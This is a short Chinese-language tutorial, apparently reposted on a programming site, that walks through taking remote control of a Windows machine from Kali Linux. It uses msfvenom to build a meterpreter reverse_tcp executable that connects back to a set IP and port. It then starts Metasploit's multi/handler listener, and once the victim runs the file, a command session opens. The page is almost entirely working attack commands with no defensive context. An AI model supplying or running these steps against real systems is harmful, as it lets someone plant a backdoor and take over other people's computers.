Kali远程控制Windows系统(Metasploit)

编程知识 更新时间:2023-04-25 08:41:36

一、在Kali Linux中生成被控端

  • 第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:
    • -p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”
    • lhost:设置kali的IP
    • lport:设置端口(要与下面的set lport保持一致)
    • -f:文件的类型为exe类型
    • -o:生成payload,名为payload.exe,保存在kali的/root目录下
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/payload.exe

  • 第二步:然后把上面在kali中生成的payload.exe移动到Windows系统中

二、在Kali Linux中启动主控端

  • 第一步:在kali中输入msfconsole命令启动Metasploit工具
msfconsole

  • 第二步:输入下面的命令,在Metasploit中使用handler作为主动端,这个handler位于exploit下的multi目录下
use exploit/multi/handler

  • 第三步:设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)
set payload windows/meterpreter/reverse_tcp

  • 第四步:设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致

  • 最后一步:执行“exploit”开启监听,等待被控端打开远程控制软件连接到此处
exploit

三、执行远程控制软件

  • 上面生成了远程控制的被控端与主控端之后,现在来执行被控端的软件,执行之后,被控端就与主控端连接了
  • 第一步:在Windows中双击这个软件

  • 第二步:执行之后,可以看到kali主控端连接上了被控端。并且开启了meterpreter会话

  • 第三步:现在主控端可以输入命令来操作被控端(注意,虽然被控端是windows平台,但是使用的命令是主控端系统所使用的命令)

更多推荐

Kali远程控制Windows系统(Metasploit)

本文发布于:2023-04-19 06:28:00,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/a78c4b2f6b7a7aec4ab638c1be1ef92a.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:远程控制   系统   Kali   Metasploit   Windows

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

  • 87169文章数
  • 19173阅读数
  • 0评论数